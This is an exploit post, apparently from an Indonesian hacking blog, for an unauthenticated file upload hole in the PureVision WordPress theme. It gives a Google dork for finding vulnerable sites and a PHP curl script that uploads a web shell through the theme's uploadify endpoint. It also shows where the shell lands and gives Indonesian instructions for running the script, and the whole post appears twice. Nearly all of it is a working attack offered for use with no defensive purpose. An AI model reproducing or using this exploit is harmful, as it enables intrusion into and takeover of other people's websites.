Exploit Title: Wordpress Themes Purevision File Upload Vulnerability
Google Dork: inurl:/wp-content/themes/purevision
[+] exploit
<?php
$uploadfile="shell.php";
$ch = curl_init("http://example.com/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/purevision/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/wp-content/themes...uploadify/
NB : bagi yg pakai os windows , install xampp , abis itu , copy exploit diatas , save as ke folder xampp > php ( extensi .php ) , buka cmd , ke folder xampp > php , ketik php exploit.php ,tinggal enter
( klo keluar angka 1 artinya exploit sukses )
Google Dork: inurl:/wp-content/themes/purevision
[+] exploit
<?php
$uploadfile="shell.php";
$ch = curl_init("http://example.com/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/purevision/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/wp-content/themes...uploadify/
NB : bagi yg pakai os windows , install xampp , abis itu , copy exploit diatas , save as ke folder xampp > php ( extensi .php ) , buka cmd , ke folder xampp > php , ketik php exploit.php ,tinggal enter
( klo keluar angka 1 artinya exploit sukses )
EmoticonEmoticon